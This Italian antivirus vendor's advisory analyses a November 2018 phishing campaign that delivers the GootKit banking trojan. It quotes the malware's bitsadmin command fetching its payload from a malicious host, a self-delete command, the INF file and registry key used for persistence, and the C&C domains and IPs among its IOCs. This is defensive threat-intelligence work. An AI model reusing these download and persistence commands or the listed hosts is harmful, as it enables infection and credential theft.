TG Soft Software House - Vir.IT eXplorer: l'AntiVirus, AntiSpyware e AntiMalware ITALIANO
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ICSA Lab ICSA Lab

Vir.IT eXplorer PRO supera il test internazionale VB100 2018-08

AMTSO

OpsWat



EICAR Membro SERIT - Security Research in ITaly

08/11/2018 17:37:42 - GootKit di nuovo in circolazione, si diffonde tramite una falsa mail con doppio inganno: un'allegato ed un link... 

      
 
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una delle mail che diffonde il malware Trojan Banker GootKit  in data  08 Novembre 2018

Il metodo per questa campagna

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE

 

Falsa Mail diffonde Trojan "GootKit"

Nome: GootKit
Famiglia malware
: Banker
VirIT: Trojan.Win32.GootKit.BBA

Descrizione
:
La mail è stata rilevata questa mattina in data 08 Novembre 2018

Esempio di email analizzata:

Oggetto [Oggetto Variabile]

 immagine_1
ingrandireimmagine

Torna ad inizio pagina

Come si diffonde:
La mail contiene un breve messaggio, il quale invita ad aprire un link chiamato "Download Conferma-2018-[NumeroCasuale]" o "Download Clienti-2018-[NumeroCasuale]"  (vedi immagine_1)  che punta a: "http://snapdragonmicroscope[.]com/share-files[.]php?download-id=SvPWuTSB&task=15&" e quando cliccato porta al download di un file di archivio .ZIP dal nome "Nuovi_2018_12_____[NumeroCasuale].zip"
  • Nome File: Nuovi_2018_11_____112071.zip
  • Dimensione: 9.257 byte
  • Md53AF4C0D0EC8AFD6D6253A973882C8769
L'archivio compresso contiene due file, uno con estensione VBS, chiamato "_Conferma Ordine 1039 del 03_02_2018 197.vbs" ed il secondo senza estensione, chiamato  "Conferma Ordine 1039 del 03_02_2018 1" quest'ultimo in realtà è un file "pdf" che una volta aperto con la corretta estensione mostrerà il testo "This page is intentionally blank" (Tradotto: Questa pagina è bianca intenzionalmente).

  • Nome File: _20180915-Eseguito_pagamento_Bollettino_Postale_0000_1107597.vbs
  • VirIT: Trojan.VBS.Dropper.BAX
  • Dimensione: 5.989 byte
  • Md5486000D09DBFDF86500A10EF4D3FAF49
Aprendo il file VBS viene eseguito il download di:
  • Il payload nella cartella temporanea dell'utente (%temp%) 
  • un'immagine da trip advisor dal seguente link: "https[:]//media-cdn[.]tripadvisor[.]com/media/photo-s/03/b6/0d/7d/b-b-al-pesce-d-oro[.]jpg", l'immagine verrà eliminata in un secondo momento mentre il payload verrà eseguito.
Di seguito il comando che va a scaricare l'immagine:

bitsadmin.exe  /transfer W1 /priority FOREGROUND https://media-cdn.tripadvisor.com/media/photo-s/03/b6/0d/7d/b-b-al-pesce-d-oro.jpg C:\Users\[user]\AppData\Local\Temp\temp67455.jpg 
 
  • Nome File: b-b-al-pesce-d-oro.jpg
  • Dimensione: 26.555 byte
  • Md5C43C3228923DC413FDE84820FF9736FE
Di seguito possiamo vedere l'immagine scaricata:


 
 


Il malware viene scaricato dal seguente sito:
  • http[:]//nestafaband[.]com/putty
con il seguente comando tramite il servizio di windows "bitsadmin.exe":
bitsadmin.exe /transfer W /priority FOREGROUND http[:]//nestafaband[.]com/putty C:\Users\[user]\AppData\Local\Temp\ynaae379
 

Il payload analizzato ha le seguenti caratteristiche:
  • Nome File: ynaae379
  • VirIT: Trojan.Win32.GootKit.BBA
  • Dimensione: 374.272 byte
  • Md5: 399E23B54AE8DFA44B64B26AFC81EF59
Dopo aver scaricato il file un'altro comando lo rinomina con il nome "C:\Users\[USER]\AppData\Local\Temp\SycComponent.v.497.exe" e successivamente lo esegue.
Il malware una volta eseguito prova a collegarsi ad un C&C server: "ricci[.]bikescout24[.]fr"  avente il seguente indirizzo IP: 109[.]230[.]199[.]169 per scambiare informazioni cifrate mentre in parallelo va a scaricare il file "tmp6EE8.tmp" avente stesso MD5 di "ynaae379" dal dominio "ricci[.]bikescout24[.]fr".
Quindi, una volta completato il download "tmp6EE8.tmp" tenterà di sostituirsi al file in esecuzione "SycComponent.v.497.exe" nella nostra analisi non riesce nell'intento e si elimina con il comando:
C:\Windows\system32\cmd.exe /c ping localhost -n 4 & del /F /Q "C:\Users\[user]\AppData\Local\Temp\tmp6EE8.tmp" > nul  
 

in aggiunta il Trojan.Win32.GootKit.BBA attraverso un secondo processo dell'eseguibile "SycComponent.v.497.exe" crea nella stessa cartella (%temp%) un file con nome "SycComponent.v.497.inf" contenente le seguenti istruzioni:
 
[Version]
signature = "$CHICAGO$"
AdvancedINF = 2.5, "You need a new version of advpack.dll"

[DefaultInstall]
RunPreSetupCommands = vwmrkfheojwprpnagrzhhqsqznlpdjshzqewbypn:2

[vwmrkfheojwprpnagrzhhqsqznlpdjshzqewbypn]
C:\Users\[user]\AppData\Local\Temp\SycComponent.v.497.exe

e si assicura una persistenza in esecuzione automatica creando la seguente chiave di registro:

[HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs]
"Count"=dword:00000001
"Path1"="C:\Users\[user]
\AppData\Local\Temp\SycComponent.v.497.inf"
"Section1"="DefaultInstall"

 
Di seguito il grafico riassuntivo dell'esecuzione del malware:




Il Trojan.Win32.GootKit fa parte della macrofamiglia dei Banker, le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta elettronica, ftp etc.

IOC

MD5:
486000D09DBFDF86500A10EF4D3FAF49
A6B659799E66C72DA78FD0A426283859
3AF4C0D0EC8AFD6D6253A973882C8769
08748A1610DF0D6EBB34499A63A5E940
C43C3228923DC413FDE84820FF9736FE


URL:
109[.]230[.]199[.]169
109[.]230[.]199[.]30
185[.]61[.]152[.]71
xmpp[.]dolcesognar[.]it
ricci[.]bikescout24[.]fr
http[:]//nestafaband[.]com/putty
http[:]//snapdragonmicroscope[.]com/share-files[.]php?download-id=SvPWuTSB&task=15&
https[:]//media-cdn.tripadvisor[.]com/media/photo-s/03/b6/0d/7d/b-b-al-pesce-d-oro[.]jpg
 
 


Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.

Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina





Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283